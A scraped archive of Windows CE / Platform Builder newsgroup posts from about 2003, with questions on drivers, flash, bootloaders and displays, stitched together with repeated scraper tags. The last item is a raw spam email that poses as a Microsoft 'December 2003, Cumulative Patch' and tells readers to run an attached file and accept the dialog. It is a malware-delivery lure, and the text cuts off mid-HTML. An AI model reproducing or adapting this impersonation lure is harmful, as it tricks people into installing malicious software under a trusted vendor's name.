Anyone use DiskOnChip as a boot device with the ARM core?
I am using CE.NET 4.2 w/ an ARM core. BSquare's Bluestreak BSP.
Does it work on ARM core?
Is it easy to integrate/replace a flash device?
Can the bootloader see the FAT partition? Tag: Debug Zones - Data Unavailable??? Tag: 45784
Display Driver
Hi
I am using the latest MediaQ display Driver for MQ1132, and it builds and
runs but gives me data aborts
294802016 PID:de7efd2 TID:cdfeed7a 0x8de1c25c: Data Abort: Thread=8de1c25c
Proc=8d869520 'gwes.exe'
4294802017 PID:de7efd2 TID:cdfeed7a 0x8de1c25c: AKY=00000031 PC=031b6540
RA=031b6538 BVA=001d3f5e FSR=00003003
Its a data misalignment issue, the hardware doesn't hang but the data aborts
affect drop down menus, the data is present and selectable in the drop down
menus but is not visable.
I only get this if I use rotation to get portrait mode, landscape mode (no
rotation) doesn't suffer from data aborts and functions correctly. I switch
between landscape and portrait by using a registry key.
Any advice would be appreciated.
Regards Tag: Debug Zones - Data Unavailable??? Tag: 45768
Multifunction card problems
Hi,
I am trying to build a set of drivers for a multifunction pc-card. It has a
wlan part , a modem. The problem is that the card has a CIS that reports a
single function. I am loading the wlan driver and the serial port driver via
the wlan one, but Cardmapwindow fails in the serial driver (I am using the
sample serial driver from microsoft). The drivers when loaded individually
(but not together) run fine. Any ideas on how to resolve this? The wlan uses
an ndis miniport driver.
Thanks! Tag: Debug Zones - Data Unavailable??? Tag: 45766
FMD driver for 2048-bytes paged NAND flash
Dear All,
I composed a FMD driver under PB 4.2. After the filesys.exe loaded it,
FMD_GetBlockStatus() is called for every block, then filesys.exe
corrupts. The call stack shows there is exception in file compactor.c,
fal.c and I can not find it under the folder \private.
Any advice is appreciated. Tag: Debug Zones - Data Unavailable??? Tag: 45754
How can i change the screen resolution
Hi,
I've made my first CE image and could run it on the target device but my
sreen size is too big.
How can i change my screen size?
Thanks,
An Tag: Debug Zones - Data Unavailable??? Tag: 45751
PB 4.1 - RDP w/autologon - empty psw - Bug ?
Dear PlatformBuilder experts,
this questions concerns the problem we are having with RDP
and autologon feature.
Given :
Platformbuilder 4.1
Thin Client project with ICA, RDP, IE
ICA autologon works fine by iteslf. Nice ...
To make autologon feature to appera with RDP, rebuild it
with #define WBT_USEAUTOLOGON parameter. You will alaso
need some minore fixes with HKCU registry things
(optional).
Here is where the problem lives.
Create a new user on the server with name Tito and an empy
paword. You may change server settings to allow this. Test
the user login interactively.
Then, on thin client create a new RDP connection with
logon Tito. Choose autologon enabled. Provide empty
passowrd.
Test the feature - it should automatically login to server
when activating the Tito logon connection. Somehow it does
not...
In the source code , it was found that empty password is
encrypted differently than normally typed password
..\wbtdsktp.cpp
So, does anybody know if this is a bug of kind ?
In theory :
a) - wbtconman writes to CE registry the connection info,
setting the Autologon flag to 1
b) - mstsc reads it back and tries to use to execute
autologon
Step a) succeeds and can be verified in registry
How about step b) to verify ?
Does anybody use RDP with CE 4.1 and autologon with empty
password successfully ?
Sincerely
Sergei Tag: Debug Zones - Data Unavailable??? Tag: 45750
Books for CE.net platform development
I am looking for an up-to-date book on building Windows CE .net platforms
(bootloader, device driver, cec-file ...). There is a lot of books for
application development and some for platform development but only up to
version Windows CE 3.0.
Are there any suggestions on such a book for Windows CE .net (>= ver. 4.0)
platform development?
Thanks,
Hans Tag: Debug Zones - Data Unavailable??? Tag: 45747
about usb printer
Hi, all
I want to add a usb printer on a CEPC, and I do the following when making
the image:
1.add OHCI
2.add Netchip NET2890 USB Function(Serial Interface)
3.add USB Function Serial Driver
4.add USB Printer Class Driver
5.add PCL Printer Driver
But after CE boot up, I still cannot print. I cannot find any printer icon
on the control panel. And in the printer setting in wordpad, under the ports
selection box, I can only find :
COM1:57600
COM1:9600
IRDA
LPT1
NETWORK
No USB at all. Who can help me ?
thx Tag: Debug Zones - Data Unavailable??? Tag: 45746
Where is my CECP?
Hi,
I've made a boot floppy disk and set NET_IRQ and NET_IOBASE to 0 because i
have a
3Com 3C920 Integrated Fast Ethernet Controller (3C905C - TX Compatible).
I've set the services for active named connection to ethernet and rebooted
the CECP with the boot
floppy but i still can't see my CECP in the available devices list.
Does anyone know what i'm doing wrong?
Thanks,
An Tag: Debug Zones - Data Unavailable??? Tag: 45744
Problem while porting WinCE.NET 4.1 on to Intel XScale (PXA 255) platform
Dear All,
We are porting WinCE .NET 4.1 on to Intel PXA255(XScale Core) platform. We
are compiling the OS using Microsoft Platform Builder. We are using Intel
PXA250 BSP as the reference platform. While running with debugger (MAJIC)
connected to the board, it is running fine and application comes up. But
when running without debugger the OS is hanging in the ARMInit function.
The problem is when a function like NKwvsprintfW is called, it is working
successfully for some 5 or 6 times and then it is hanging.
When we dumped the stack contents, we found that, when the arguments that
are passed to functions like NKwvsprintfW, when being stored they are not
getting stored properly sometimes.
The arguments which are coming in registers(like r0, r1, r2), when being
stored in stack, are not getting stored properly. Sometimes even the link
register (containing the return address) is not getting stored properly.
When we by-passed the function (NKwvsprintfW, SP_GetFmtValue) it is hanging
in a different function for the same reason. We tried this in three
diferrent boards with the same result.
Could you please help us to solve this problem.
Regards,
Saravana Pandian S.A. Tag: Debug Zones - Data Unavailable??? Tag: 45737
Re: How to modify TI1250 driver to support TI1520 PCMCIA controller
Dear All,
Platform Builder provides driver support for TI PCI1250 PCMCIA controller,
"TI1250".
PCI1250 controller is obsolete.
We use the newer PCI1520 controller to provide PCMCIA interface.
From the datasheet, PCI1520 and PCI1250 controller are very similar
(probably more than 90% similar).
Has anyone modified the TI1250 driver to support TI's PCI1520 PCMCIA
controller under Windows CE .NET 4.1 or 4.2?
If you have done so, can you post the how to on this news group?
Thanks in advance for your help!
Samuel Phung
ICOP Technology Inc. Tag: Debug Zones - Data Unavailable??? Tag: 45732
Flash Image Starting Issue for XScale vs. WinCE.NET 4.2
Hi Sir,
I try to download the bootloader. Using ethernet download image to Lubbock
board's flash with "Enable Image for flash". After image download to flash.
I try to enable the the function "Launch existing flash resident image now"
function. But I can't enable the image properly. The LED show "00 0c 0d e0"
error message. The log informatin as below:
*******Beginning System Initialization*******
SDCLK[1] = MemClk/2
MemClk = 132.71 MHz
Run Mode = MemClk
Turbo Mode = 3 * Run Mode
Mode: RUN
******************************************************
******************************************************
******************************************************
******************************************************
******************************************************
OEMInitDebugSerial using UART1
Microsoft Windows CE Ethernet Bootloader Common Library Version 1.0 Built
Mar 13 2003 23:08:10
Microsoft Windows CE Ethernet Bootloader 3.3 for the Intel DBPXA250
Development Platform (Built Dec 4 2003)
Press [ENTER] to download now or [SPACE] to cancel.
Initiating image download in 5 seconds. 4 seconds. 3 seconds. 2 seconds. 1
seconds.
Ethernet Boot Loader Configuration:
0) IP address: 192.168.80.2
1) Subnet mask: 255.255.0.0
2) Boot delay: 5 seconds
3) DHCP: Enabled
4) Reset to factory default configuration
5) Download new image at startup
6) Program RAM image into FLASH: (Disabled)
7) Program SMSC MAC address
8) Boot device order: SMSC -> PCMCIA -> CF
9) Check image signature(s): (Disabled)
D) Download image now
F) Format flash (will not overwrite eboot or eboot parameters)
L) Launch existing flash resident image now
Enter your selection: 4
Resetting factory default configuration ...
Ethernet Boot Loader Configuration:
0) IP address: 192.168.80.2
1) Subnet mask: 255.255.0.0
2) Boot delay: 5 seconds
3) DHCP: Enabled
4) Reset to factory default configuration
5) Download new image at startup
6) Program RAM image into FLASH: (Disabled)
7) Program SMSC MAC address
8) Boot device order: SMSC -> PCMCIA -> CF
9) Check image signature(s): (Disabled)
D) Download image now
F) Format flash (will not overwrite eboot or eboot parameters)
L) Launch existing flash resident image now
Enter your selection: l
Writing 0x80068118 to flash address 0xB8340000 (length=0xA3C).
Sector=0x200 (Length=0x6) Block=0x1 (Length=0x1).
Handling non-block aligned data...
FlashErase: Unlocking flash block(s) [0x1, 0x1] (please wait): Done.
Erasing flash block(s) [0x1, 0x1] (please wait): .Done.
Writing to flash (please wait): Done.
System ready!
Preparing for download...
Done.
Download successful! Jumping to image at physical 0x81000...
-------------------------------------------
Any suggestion is welcome
Thanks,
JLL Tag: Debug Zones - Data Unavailable??? Tag: 45730
256mb nand flash driver
Hi all.
Windows CE support the 'FAL', so we can make the FMD driver.
But, Is it possible the size of FMD driver is 256MB?
Best Regards Tag: Debug Zones - Data Unavailable??? Tag: 45729
Display xscale
Hi all,
Hardware details
1) xscale board
2) LG philips 6.4" 640 * 480 TFT VGA lcd panel
3) ads 7843 touch panel controller
We have loaded win CE on to the board, everything is fine i can see
the kernel loading in the KITL o/p...and also i see the display on the
LCD, the desktop the icons.everything no distortion, no flickering
nothing. Cool....BUT, the display remains like this for 5 to 6 secs
and then vanishes, it reappears and stays for a few seconds, vanishes
again and this repeats.
I put some break points in the Power manager files, drv.c and saw the
PowerThread calls PmUpdatePowerStatus every few seconds. THis looks
ok, because in power status of the system is not changing, it remains
constant.
Also i noticed that in PmFindState there is a switch case
switch(POWER_STATE(dwFlags)) where i see POWER_STATE_ON,
POWER_STATE_OFF, POWER_STATE_IDLE, POWER_STATE_SUSPEND. But right from
the begining till the kernel loads and all the services starts
running, the code never goes inside this switch case. Could this be
the reason for the problem i am facing.
thanks and regards
prasanna Tag: Debug Zones - Data Unavailable??? Tag: 45726
ANN: Windows CE .NET Chat tomrrow
Just a note that we'll be hosting an online chat tomorrow concerning the
Windows CE .NET operating system. Members of the development team will be
on hand ready to answer your questions, so bring 'em on! Hope to see you
there.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: Windows CE .NET Live Chat
December 4, 2003
10:00 - 11:00 A.M. Pacific time
1:00 - 2:00 P.M. Eastern time
18:00 - 19:00 GMT/BST
Description: Do you have tough technical questions regarding Windows CE .NET
for which you're seeking answers? Do you want to tap into the deep knowledge
of the talented Microsoft Embedded Devices Group members? If so, please join
us for a live Windows CE .NET chat and bring on the questions! Windows CE
.NET is the operating system that is powering the next generation of 32-bit,
small-footprint and mobile devices. This chat will cover the tools and
technologies used to develop devices using the Windows CE .NET operating
system.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To join this chat go to http://msdn.microsoft.com/chats
--
Thanks!
Michael Fosmire
This posting is provided AS IS with no warranties, and confers no rights. Tag: Debug Zones - Data Unavailable??? Tag: 45713
LockPages - will this work?
I would like to lock into memory a small part of the code within a
driver. While the LockPages API is fairly straight forward, other
people in the group have mentioned that the real problem is how to get
the start address of the code pages to be locked (along with the
number of pages). I've come up with what I think is a simple way of
doing this and it seems to work (i.e. LockPages succeeds), but I'd
like to know what others think about it. So, here it is.
1) Put a #pragma code_seg(".somename") right before the code to be
locked.
2) Put the following routine right after the #pragma code_seg and
before the code to be locked:
void LockCode()
{
LockPages(LockCode, (PCHAR)EndLockCode - (PCHAR)LockCode,
NULL, LOCKFLAG_READ);
}
3) Put the following routine right after the code to be locked.
void EndLockCode()
{
}
4) Call LockCode sometime during initialization.
Since code segments start on page boundaries, and LockCode is the
first routine in the segment, it should be aligned on a page boundary.
Is this a safe assumption?
Also, do I need to round the size of the code to be locked (i.e.
EndLockCode - LockCode) up to the nearest multiple of the page size?
Are there any other reasons why this might not work? Tag: Debug Zones - Data Unavailable??? Tag: 45706
PARTINFO does not match documentation
Hi,
From the PB 4.2 help, there is a member of the tagPARTINFO structure,
snFirstSector, that defines the first sector of a partition. However in
storemgr.h in the SDK folder, the tagPARTINFO structure has no such member.
Anyone have info on this?
Thanks,
Nick. Tag: Debug Zones - Data Unavailable??? Tag: 45704
ANN: New Chinese language Windows Embedded Community Site
Hello,
I know that this may not interest everyone, but I wanted to mention that a
new Chinese language Windows Embedded Community Site has recently been
launched. There you'll find links to Chinese language Windows CE .NET,
Windows XP Embedded and Mobile Device newsgroups as well as other localized
technical information.
Please see the following site for more information:
http://www.microsoft.com/taiwan/community/embedded/
--
Thanks!
Michael Fosmire
Community PM/MVP Lead, Windows Embedded
This posting is provided AS IS with no warranties, and confers no rights. Tag: Debug Zones - Data Unavailable??? Tag: 45703
FMD_OEMIoControl - Passing parameters?
I created an IOCTL for my FMD driver which works OK (DeviceIoControl
called with my IOCTL successfully calls FMD_OEMIoControl).
Now, the problem is, all parameters to FMD_OEMIoControl (pInBuf,
nInBufSize etc.) are 0. The help says that all parameters are set to
zero if the dwIoControlCode parameter does not specify to require
these data.
So how do I have to setup my dwIoControlCode? The CTL_CODE macro does
not seem to be the right place to configure this, so where else do I
have to look? Or am I missing something here?
Thanks in advance.
Marc Tag: Debug Zones - Data Unavailable??? Tag: 45698
PCMCIA/CF - no activity on the bus
I am in the process of target board hardware/software debugging.
My system uses Au1100 chip and I use Windows CE .NET (4.2).
A lot of peripherals work fine and this is good thing :-)
The problem I have now is I do not see ANY activity on
the PCMCIA bus - actually it is CF in my case...
I drive CF_RESET pin on the card to be LOW and then try to read
"tuples" from ATTRIB area of the CF card with the original BSP
code but I got complete junk data...
I have tapped logic analyzer to several signals: PCE0, PCE1,
ROE, POE, CF_A0-A10 (address bus in CF connector) and several other
signals on the connector side, behind drivers/buffers and I see
nothing happens when I read the card. The only signals change
is RESET, CF_DETECT (when I insert the card) and RDY/-BSY telling
me the CF is ready... then: only silence...
On the software side, I have assigned RESET, CF_DETECT and RDY/-BSY
pins to be driven by GPIO200, GPIO22 and GPIO21 respectively and
I set sys_pinfunc bit 18 to 0 to have PREG, PCE1, PCE2, PWE functions
instead of GPIO207:204 (standard setting for PCMCIA) and also
bit 17 to 1 to have access to GPIO200. I have also verified there
is PCMInitialize function called to fill TLB with three 16M-byte
large virtual memory pages to match PCM_IO, PCM_ATTR, PCM_MEM
physical addresses - this code is from the original BSP...
Bits set in EntryHi and EntryLo0, EntryLo1 looks good and match
both virtual addresses hardcoded in bootloader header files and
physical addresses of PCMCIA interface controller area...
The problem is that when PCMTuplePtr (set to virtual 0x1E00 0000
mapped to 0xF 4000 0000 physical address of the Attribute Memory area)
is read in PCMReadFirstTuple nothing happens on the bus... including no
activity on chip-selects and junk content of memory is read like this:
Tuple Code=0x00
00
0E 08 0E 08 0E 08 0E 08 0E 08 0E 08 0E 0A 83 0E
80 06 00 00 00 3E 83 0E 80 42 19 00 50 7C 8C 0E
80 00 00 00 00 0A 00 00 00 00 00 00 00 0A B3 00
C0 3E 00 00 00 EC 83 0E 80 0D 00 00 00 0A 00 00
00 04 00 00 00 04 00 00 00 04 00 00 00 0A 00 00
00 00 00 00 00 04 00 00 00 0D 00 00 00 FC 9F 01
80 00 00 00 00 FC 9F 01 80 21 09 81 99 8C 67 0E
80 31 04 86 18 21 00 00 00 61 08 22 6A 22 60 52
56 14 60 40 00 7C 8F 05 80 21 00 00 00 00 00 00
00 7C 8F 05 80 8C 8F 05 80 04 00 00 00 FF FF
Tuple Code=0x00
Tuple Code=0x0A
Tuple Code=0x0A
[program is looping thinking it reads from CF memory]
Is there anything I could miss in regards to PCMCIA/CF setup?
Do you know any other ways to debug this problem? Tag: Debug Zones - Data Unavailable??? Tag: 45695
Device driver should load before StorageManager
Hi everyone
I am using a hive based registry.
The HIVE BOOT SECTION looks something like this (pseudo)
;HIVE BOOT SECTION
start DevMgr = 1 ; allow for hive based registry
StorageManager autoload Flash profile
ourDeviceDriver order:0
flashDriver order:1
;END HIVE BOOT SECTION
The Boot order now is the following:
--------------------------------------------------------
0) Boot registry is loaded
1) Storage Manger starts
-autoload flash profile loads 'flashDriver'
2) built in drivers are loaded
ourDeviceDriver
(flashDriver is already loaded and thus not loaded again)
What I would need is:
----------------------------------
0) Boot registry is loaded
1) ourDeviceDriver is loaded
2) <do everything else>
It is extremely important that 'ourDeviceDriver' is loaded prior to
any driver else, i.e. 'flashDriver' depends on 'ourDeviceDriver'.
Does anyone know how it can be achieved to load a device driver as
soon as the Boot Registry is available BEFORE any other driver or
component is loaded?
Any hints appreciated, thanks.
-Michael Tag: Debug Zones - Data Unavailable??? Tag: 45691
Look into NK.bin
Hello
is it possibly to look inside the NK.BIN?? I want too see the Files into the
NK.BIN.
Thanks Tag: Debug Zones - Data Unavailable??? Tag: 45690
Platform Manager connection with Emulator was broken !
Hi Gurus,
I have developed a desktop app which talks with its
smartphone agent over two Platform Manager connection
streams, but I found the connections sometimes will be
broken automatically by CEMGR, and I am sure the device
side agent is still alive, and I never saw such situation
occurs with only one connection stream mode.
While I checked WinCE log of Event Viewer, found the
following information could be the cause for such
termination:
-----------------------------------------------------
Event Type: Information
Event Source: cemgr
Event Category: None
Event ID: 1
Date: 2003-12-3
Time: 23:32:03
User: N/A
Computer: CCCC
Description:
Process Id: 424 Thread Id: 1524 Source: Message:
ConnectionManager: keepalive heartbeat exiting. All
emulator sessions are shutdown.
-----------------------------------------------------
Thanks if anybody can give me some explainations in depth.
Best regards,
Bill Tag: Debug Zones - Data Unavailable??? Tag: 45685
Sleep or Wait in BIOSLOADER
Hello,
has anybody written a Sleep or Wait function for the BIOSLOADER?
I need a function which waits some milliseconds. I would like to place
this function in Main.c so I am already in proteced-mode.
Any tips?
Regards Peter Tag: Debug Zones - Data Unavailable??? Tag: 45684
Bluetooth HCI stack (CE .NET 4.2)
Hi,
We are trying to embed a serial Bluetooth module with HCI stack onto our
serial port 3 on a StrongARM - SA1110 processor board). As the BT module has
the HCI stack installed, we rely on the Windows CE .NET BT HCI UART driver
(bthuart.dll). All we in theory would have to do is to embed it using RX,TX,
and RTS,CTS lines and install the bthuart.dll, which then allows the upper
layers to comunicate with the BT module via the Serial port driver (SP3).
We also have another module multiplexed with the BT module (rx,tx,cts,rts
lines).
My question is:
Does a bluetooth connection get disconnected by the upper layers if I via
the MUX disable the serial port lines to the BT module for e.g. 3 seconds
but leave the power on to the module? Does microsoft have any documentation
on how the upper stack's timeouts and how long time the module can be
disconnected before the upper stack will asume a reset?
Generally what this means is that we want to use the other module for 3
seconds or less during an established TCP/IP connection to a BT access
point, without having to re-connect to the BT access point.
Any comments?
Best regards,
Bo Henriksen Tag: Debug Zones - Data Unavailable??? Tag: 45680
Newbie Windows CE.net
Hi,
I'm new to Windows CE.net.
Does anyone know a good link on the www to learn CE.net?
I've tried to build an image but where do i find the image and how can i use
it on the target device?
Thanks,
An Tag: Debug Zones - Data Unavailable??? Tag: 45675
seraching WAN-Driver
Hello,
Where can I get a WAN-Driver (WIN CE 3.0) that works with CAPI.dll??
Tanks Tag: Debug Zones - Data Unavailable??? Tag: 45672
More ISAPI extension questions
I used platform builder 4.1 to create an emulator target.
The CE web server appears to be working. A virtual path
was created using the HKEY_LOCAL_MACHINE\Comm\HTTPD\VROOTS
key in projects.reg, but it is not working. Can a virtual
path map to any physical path or just to subdirectories
off of the localhost path and does this work on the
emulator? I am trying to access my isapi extension dll
which is located in the "release" directory.
Thanks,
Jim King Tag: Debug Zones - Data Unavailable??? Tag: 45663
CE on an ASUS PC board
On
http://www.microsoft.com/windows/Embedded/ce.NET/evaluation
/hardware/x86.asp
Microsoft gives reference of the board Asus TUSL2-C Intel
815EP.
the problem is that ASUS doesn't supply any more this
board .
The new boards don't use the Intel 815EP chip but a new
one Intel 885. BSP of this chip is not included in PB 4.2.
What is the best solution if we want to work on CE with a
standard PC board ?
Thanks. Tag: Debug Zones - Data Unavailable??? Tag: 45662
AVStream for CE .net
I want to write a video capture driver for a USB video capture device.
However, the referene driver source codes are for AVStream in Win32
platform. Does any one know how to port the AVStream into CE .net? Tag: Debug Zones - Data Unavailable??? Tag: 45657
How to compile vb6 programe to Ce.Net4.2 version?
Dear all,
I have a vb6 code with acess2k Database, I would like to put this
application to CE.Net4.2 emulator, Anyone knows how to do it?
thanks for any help Tag: Debug Zones - Data Unavailable??? Tag: 45654
Which variable for multilanguage.
Hi, all:
Here I want to build a system which support English and Chinese.
Yes, I can set Locals in Setting tab from IDE, but which variables in
command line for this ?
I browse Foo.wce file and find these statements:
# PROP Locales "0409 0804"
# PROP DefaultLang "0804"
When I run cebuild in command line, is there any logic to access these
statements ?
I wonder how to make the command line build as same as IDE environment
build.
Best regards.
Jack. Tag: Debug Zones - Data Unavailable??? Tag: 45651
library allowing image download through ethernet
Hi all,
I'm looking for a command line tool or a library that I could use on a PC
from an application to download an image through ethernet (or USB via
RNDIS).
The goal is to deliver to users a PC application which allows image update
on our device. As the .BIN file transfer protocol is fully designed (and
implemented in PB and eshell), I wonder if there is a lib or dll I could use
that would implement the protocol.
Thanks by advance
Yannick
--
----------------------------------------------------------------
Yannick Chamming's
ADESET
Windows Embedded Manager
ychammings_AT_adeset_DOT_com>
http://www.adeset.com
Tél : +33 (0)4.72.18.57.77
Fax : +33 (0)4.72.18.57.78
---------------------------------------------------------------- Tag: Debug Zones - Data Unavailable??? Tag: 45648
Question about NK.bin
Hi all,
How to write my own information into the NK.bin?
For example:
I want to write "CE420b2" in the fixed offset of NK.bin.
Can I finish that while making the nk image?
Thanks
Bryan Tag: Debug Zones - Data Unavailable??? Tag: 45642
Does IE5.5 support hotmail email Attached file receiving or sending?
Hi: as we know ,wince4.1 ' IE version is 5.5, when I receive hotmail
attachfile or just want to send an attach,it showes out:download IE6,I 'd
like to ask if we have some other method to solve this proBlem, Does MS
afford the QFE concerned?
Thank you in advance. Tag: Debug Zones - Data Unavailable??? Tag: 45640
Does CE.net support ARM720T ?
Hi all,
Does CE.net support ARM720T ? If yes, why CEPB has not a BSP for ARM720t?
If not, Where or how can I get a BSP for it?
Thank you very much
Regards
Lee Tag: Debug Zones - Data Unavailable??? Tag: 45635
How to use Ramdisk and MyFSD from CE 3.0 to CE.NET
How to use Ramdisk and MyFSD from CE 3.0 to CE.NET
Hi there
I am porting Ramdisk driver and MyFSD driver CE3.0 to CE.Net.
This module work fine CE 3.0. but CE.Net don't work.
RAMDISK device is visible Explorer on CE3.0, but .Net is net seen.
And MyFSD Load is failed(LoadFSDEx()). Then, How to load MyFSD and link
Ramdisk.
I looking for newsgroup this information. but I don't understand Registry
setting and How to load MyFSD.
Anybody send me some information. Please.
I'm sorry. I don't speak english very well. ^__^ Tag: Debug Zones - Data Unavailable??? Tag: 45631
Error during Build|Clean
I get the following error during a Build|Clean operation:
Deleted intermediate files and output files for project 'AU1100TEST2 - AMD
DB1100: MIPSII Win32 (WCE MIPSII) Debug'.
Warning PB2020: Unable to copy file(s). The path is invalid or the files do
not exist: -
C:\WINCE420\platform\DB1100\target\MIPSII\retail\ddi_au1100lcd.dll
1 File(s) copied
1 File(s) copied
1 File(s) copied
1 File(s) copied
1 File(s) copied
If you'll notice, it is trying to copy the ddi_au1100lcd.dll from the
*retail* folder. This seems odd to me for two reasons,
1) I have never built the retail version, why it would copy it from that
folder?
2) I would assume that the LCD DLL would be cleaned and re-built, not copied
as part of a clean.
Can anybody shed some light on this?
--
Frank D. Lombardo
Turning Point Technology, Inc.
Frank_AT_TurningPointOnline_DOT_com Tag: Debug Zones - Data Unavailable??? Tag: 45626
How to get the different device category's feature
Hi all
At the FeatureView window,
Can I use some feature of the Display based devices to the headless devices?
How to export the some feature of the display based devices and How to get
the exported features to headless devices?
Thanks
Jeff Lee Tag: Debug Zones - Data Unavailable??? Tag: 45625
Use touch screen on a VIA board.
All,
I got a VIA EPIA M-Series Mini-ITX mainboard and tried to install touch screen
driver on WinCE 4.2 .NET.
According to touch screen manual,
1. I have to add
the Catalog->Core OS->Shell and User Interface->
User Interface->Touch Display(Stylus) Component in my platform
and
the Catalog->Core OS->Shell and User Interface->
User Interface->Mouse Component in my platform.
2. I edited project.bib to include touchscreen driver
and
added registry setting on project.reg.
But I couldn't find "Stylus" from Control panel after booting up.
The manual said Stylus would calibrate Touch Screen.
This board has one Serial port on rear side and the other on board.
I only use com1 to connect touch screen.
Though I disable debug output serial on "debug.c", I still don't see "Stylus"
on control panel.
Do you give me some tip?
Thanks in advance.
Hwansoo Tag: Debug Zones - Data Unavailable??? Tag: 45621
system freeze
I've written an application that runs just fine for
about 4 hours. After that the system freezes.
I've talked to some people that experienced a simliar
behaviour when there was memory leak on the driver level.
I have no clue about the driver vs. application level.
Whether there are different memory pools or whatever.
So I am not quite sure where to search the bug. Anyway
a leak detecting software reports no memory nor GDI
leaks for the application. The allocated memory is *not*
instantly growing (besides this would make a dialog pop up)
Reducing the memory in the control center
at least seems to make the freeze happen earlier.
Does this ring a bell for anyone?
...I am really lost here!
I need to know if this is a problem of my application
or of a driver/software that comes from the vendor.
--
Torsten Tag: Debug Zones - Data Unavailable??? Tag: 45619
OEM Application and unique hardware
I need to understand how an OEM can support unique
hardware modules with their tailored applications. I am
aware of the stream interface that can be used by user
mode applications via the file system interface, but I
would prefer not to go this route.
Is there information available that describes how to
bridge between a device driver with a custom interface,
trusted OEM application and ultimately to a untrusted user
application?
Nathan Tag: Debug Zones - Data Unavailable??? Tag: 45617
Check out this internet update from the Microsoft Corporation
--osonvhkcnkkyjj
Content-Type: multipart/related; boundary="oneoehhugufmkbqz";
type="multipart/alternative"
--oneoehhugufmkbqz
Content-Type: multipart/alternative; boundary="qnwfjfcwotliwqb"
--qnwfjfcwotliwqb
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Microsoft Consumer
this is the latest version of security update, the
"December 2003, Cumulative Patch" update which eliminates
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three newly discovered vulnerabilities.
Install now to help protect your computer
from these vulnerabilities, the most serious of which could
allow an malicious user to run executable on your computer.
This update includes the functionality =
of all previously released patches.
System requirements: Windows 95/98/Me/2000/NT/XP
This update applies to:
- MS Internet Explorer, version 4.01 and later
- MS Outlook, version 8.00 and later
- MS Outlook Express, version 4.01 and later
Recommendation: Customers should install the patch =
at the earliest opportunity.
How to install: Run attached file. Choose Yes on displayed dialog box.
How to use: You don't need to do anything after installing this item.
Microsoft Product Support Services and Knowledge Base articles =
can be found on the Microsoft Technical Support web site.
http://support.microsoft.com/
For security-related information about Microsoft products, please =
visit the Microsoft Security Advisor web site
http://www.microsoft.com/security/
Thank you for using Microsoft products.
Please do not reply to this message.
It was sent from an unmonitored e-mail address and we are unable =
to respond to any replies.
----------------------------------------------
The names of the actual companies and products mentioned =
herein are the trademarks of their respective owners.
Copyright 2003 Microsoft Corporation.
--qnwfjfcwotliwqb
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
<style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none}
</style>
</HEAD>
<BODY BGCOLOR=3D"White" TEXT=3D"Black">
<BASEFONT SIZE=3D"2" face=3D"verdana,arial">
<TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB">
<TR height=3D"20">
<TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">
<FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/"
TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A>
</B></I></FONT>
</TD>
<TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP>
<FONT color=3D"#ffffff" size=3D1>
<A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' =
target=3D"_top">All Products</A> |
<A class=3D'navtext' href=3D'http://support.microsoft.com/' =
target=3D"_top">Support</A> |
<A class=3D'navtext' href=3D'http://search.microsoft.com/' =
target=3D"_top">Search</A> |
<A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top>
Microsoft.com Guide</A>
</FONT>
</TD>
</TR>
<TR>
<TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP>
<FONT FACE=3D"Verdana, Arial" SIZE=3D1><B>
<A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top">
Microsoft Home</A> </B>
</FONT>
</TD>
</TR>
</TABLE>
<IMG SRC=3D"cid:vamwzqp" BORDER=3D"0"><BR><BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
Microsoft Consumer<BR><BR>
this is the latest version of security update, the
"December 2003, Cumulative Patch" update which eliminates
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three newly discovered vulnerabilities.
Install now to help protect your computer
from these vulnerabilities, the most serious of which could
allow an malicious user to run executable on your computer.
This update includes the functionality =
of all previously released patches.
</FONT></TD></TR>
</TABLE>
<BR><BR>
<TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600">
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fwmbvhw" =
ALIGN=3D"absmiddle" BORDER=3D"0"> System requirements</B>
</FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fwmbvhw" =
ALIGN=3D"absmiddle" BORDER=3D"0"> This update applies to</B>
</FONT></TD><TD NOWRAP>
<FONT SIZE=3D"1">
MS Internet Explorer, version 4.01 and later<BR>
MS Outlook, version 8.00 and later<BR>
MS Outlook Express, version 4.01 and later
</FONT>
</TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fwmbvhw" =
ALIGN=3D"absmiddle" BORDER=3D"0"> Recommendation</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Customers should install the patch =
at the earliest opportunity.</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fwmbvhw" =
ALIGN=3D"absmiddle" BORDER=3D"0"> How to install</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Run attached file. =
Choose Yes on displayed dialog box.</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:fwmbvhw" =
